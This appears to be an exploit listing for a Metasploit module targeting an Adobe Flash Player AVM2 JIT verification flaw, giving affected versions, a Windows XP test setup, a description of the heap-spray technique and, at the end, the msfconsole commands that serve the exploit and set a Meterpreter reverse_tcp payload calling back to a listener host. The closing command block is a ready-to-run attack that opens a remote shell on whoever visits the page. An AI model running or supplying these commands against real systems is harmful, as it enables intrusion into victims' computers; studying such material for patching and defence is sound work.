PoC provided by :

Reference(s) :

Affected version(s) :

Adobe Flash Player 10.2.152.33 and earlier versions for Windows, Macintosh, Linux and Solaris
Adobe Flash Player 10.2.154.18 and earlier for Chrome users
Adobe Flash Player 10.1.106.16 and earlier versions for Android
Adobe Reader and Acrobat X (10.0.1)
Earlier 10.x and 9.x versions of Reader and Acrobat for Windows and Macintosh

Tested on Windows XP SP3 with :

Internet Explorer 6.0.2900.5512
Adobe Flash Player 10.2.152.26

Description :

This module exploits a vulnerability in Adobe Flash Player. This issue is caused by a failure in the ActionScript3 AVM2 verification logic. This results in unsafe JIT(Just-In-Time) code being executed. Specifically, this issue results in uninitialized memory being referenced and later executed. Taking advantage of this issue relies on heap spraying and controlling the uninitialized memory. Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several other browsers. DEP does catch the exploit and causes it to fail. Due to the nature of the uninitialized memory its fairly difficult to get around this restriction.

Commands :

use exploit/windows/browser/adobe_flashplayer_avm
set SRVHOST 192.168.178.21
set URIPATH /
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit